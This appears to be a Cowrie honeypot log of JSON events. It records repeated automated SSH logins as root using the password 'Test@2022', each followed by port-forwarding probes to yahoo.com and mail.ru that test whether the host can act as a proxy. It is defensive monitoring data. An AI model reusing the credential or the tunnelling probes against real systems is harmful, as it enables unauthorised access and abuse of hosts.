{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":22305,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:22305","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.548878Z","session":"5c340bd78193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.599288Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.650273Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43350,"dst_ip":"1.2.3.4","dst_port":22,"session":"67d9d820bd84","protocol":"ssh","message":"New connection: 77.83.207.83:43350 (1.2.3.4:22) [session: 67d9d820bd84]","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.699704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.700661Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.751643Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.003163Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.session.closed","duration":12.758481740951538,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.046955Z","src_ip":"212.227.235.229","session":"23733f27631a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12687,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12687","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.054331Z","session":"67d9d820bd84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.104956Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":8923,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8923","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.248797Z","session":"67d9d820bd84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37083,"dst_ip":"1.2.3.4","dst_port":23,"session":"9eb0aa300a22","protocol":"telnet","message":"New connection: 212.227.235.229:37083 (1.2.3.4:23) [session: 9eb0aa300a22]","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.292491Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.299099Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":3554,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3554","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.440794Z","session":"67d9d820bd84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.491197Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.542543Z","src_ip":"77.83.207.83","session":"67d9d820bd84"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43450,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd41d3ffd146","protocol":"ssh","message":"New connection: 77.83.207.83:43450 (1.2.3.4:22) [session: bd41d3ffd146]","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.591901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.592655Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.643383Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.894090Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20490,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20490","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.945024Z","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:24.995268Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":21015,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21015","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.136609Z","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.186905Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":1209,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1209","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.328569Z","session":"bd41d3ffd146"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.378842Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.430165Z","src_ip":"77.83.207.83","session":"bd41d3ffd146"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43545,"dst_ip":"1.2.3.4","dst_port":22,"session":"0205fb615ced","protocol":"ssh","message":"New connection: 77.83.207.83:43545 (1.2.3.4:22) [session: 0205fb615ced]","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.480559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.481555Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.533559Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.792581Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20130,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20130","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.846074Z","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:25.898232Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":24604,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24604","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.046236Z","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.098450Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":16500,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16500","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.246245Z","session":"0205fb615ced"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.298227Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.351091Z","src_ip":"77.83.207.83","session":"0205fb615ced"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43651,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb3b9b9154a6","protocol":"ssh","message":"New connection: 77.83.207.83:43651 (1.2.3.4:22) [session: cb3b9b9154a6]","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.399908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.409841Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.450057Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.699419Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19395,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19395","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.750811Z","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.800793Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":19405,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19405","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.944317Z","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:26.994578Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27923,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27923","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.136532Z","session":"cb3b9b9154a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.186580Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.238049Z","src_ip":"77.83.207.83","session":"cb3b9b9154a6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43751,"dst_ip":"1.2.3.4","dst_port":22,"session":"06c6b6c1bf14","protocol":"ssh","message":"New connection: 77.83.207.83:43751 (1.2.3.4:22) [session: 06c6b6c1bf14]","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.287391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.297506Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.338124Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
